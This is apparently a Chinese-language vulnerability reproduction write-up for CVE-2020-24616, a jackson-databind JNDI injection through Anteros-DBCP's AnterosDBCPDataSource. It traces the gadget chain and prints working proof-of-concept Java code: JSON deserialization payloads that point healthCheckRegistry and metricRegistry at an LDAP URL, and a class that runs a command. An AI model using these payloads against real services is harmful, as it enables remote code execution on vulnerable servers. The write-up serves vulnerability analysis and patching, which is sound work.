（CVE-2020-24616）FasterXML_jackson-databind_远程命令执行漏洞

# （CVE-2020-24616）FasterXML jackson-databind 远程命令执行漏洞

=====================

一、漏洞简介
————

br.com.anteros.dbcp.AnterosDBCPConfig类绕过了之前jackson-databind维护的黑名单类，并且JDK版本较低的话，可造成RCE。

### 利用条件

– 开启enableDefaultTyping()

– 使用了br.com.anteros第三方依赖

二、漏洞影响
————

jackson-databind before 2.9.10.4jackson-databind before 2.8.11.6jackson-databind before 2.7.9.7

三、复现过程
————

### 漏洞分析

> 相关信息：

`https://github.com/FasterXML/jackson-databind/issues/2814`

1.png

之后查找对应的issue，找到对应的绕过黑名单类：

2.png

之后在源码中定位到`br.com.anteros.dbcp.AnterosDBCPDataSource`类，可以看到该类继承自`AnterosDBCPConfig`类：

3.jpeg

之后全局搜索`healthCheckRegistry`发现在函数`setHealthCheckRegistry`作为参数进行传递，之后该参数被传入了`super.setHealthCheckRegistry(healthCheckRegistry);，`也就是调用了父类的`setHealthCheckRegistry`方法，并将此参数作为只传递，下面我们跟进该函数来看看：

4.jpeg

在父类的`setHealthCheckRegistry`方法中首先会判断`healthCheckRegistry`是否为空，如果不为空则调用当前类的`getObjectOrPerformJndiLookup`方法并将`healthCheckRegistry`作为参数传递，下面继续跟踪看看：

5.jpeg

之后再`getObjectOrPerformJndiLookup`方法中可以看到，此处的参数`object`(即:传入的数据类型healthCheckRegistry的值)首先会判断其数据类型，可以看到数据类型为`String`时会被带入`initCtx.lookup`，从而导致JNDI注入：

6.jpeg

> 整个利用链如下所示：

mapper.readValue
->AnterosDBCPDataSource.setHealthCheckRegistry
->AnterosDBCPDataSource.setHealthCheckRegistry
->AnterosDBCPDataSource.getObjectOrPerformJndiLookup
->initCtx.lookup();

### 漏洞复现

pom.xml如下所示：

com.fasterxml.jackson.core
jackson-databind
2.9.10.4


com.fasterxml.jackson.core
jackson-databind
2.11.2


br.com.anteros
Anteros-DBCP
1.0.1


org.slf4j
slf4j-nop
1.7.2



javax.transaction
jta
1.1

#### 漏洞利用

##### Exploit.java代码如下：

import java.lang.Runtime;

public class Exploit {
static {
try {
Runtime.getRuntime().exec(“calc”);
} catch (Exception e) {
e.printStackTrace();
}
}
}

之后编译Exploit.java，并且使用python启动一个简易的Web服务，将Exploit.class文件放置到web目录下，之后使用marshalsec启动一个LDAP服务：

7.png

##### 执行漏洞POC1:

import com.fasterxml.jackson.databind.ObjectMapper;

public class POC {
public static void main(String[] args) throws Exception {
String payload = “[\”br.com.anteros.dbcp.AnterosDBCPDataSource\”,{\”healthCheckRegistry\”:\”ldap://127.0.0.1:1099/Exploit\”}]”;
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
mapper.readValue(payload, Object.class);
}
}

之后运行该程序，成功执行命令，弹出计算器：

8.jpeg

##### 执行漏洞POC2

Poc.java代码如下所示：

import com.fasterxml.jackson.databind.ObjectMapper;

public class POC {
public static void main(String[] args) throws Exception {
String payload = “[\”br.com.anteros.dbcp.AnterosDBCPDataSource\”,{\”metricRegistry\”:\”ldap://127.0.0.1:1099/Exploit\”}]”;
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
mapper.readValue(payload, Object.class);
}
}

之后运行该程序，成功执行命令，弹出计算器：

9.jpeg

参考链接
——–

> https://xz.aliyun.com/t/8210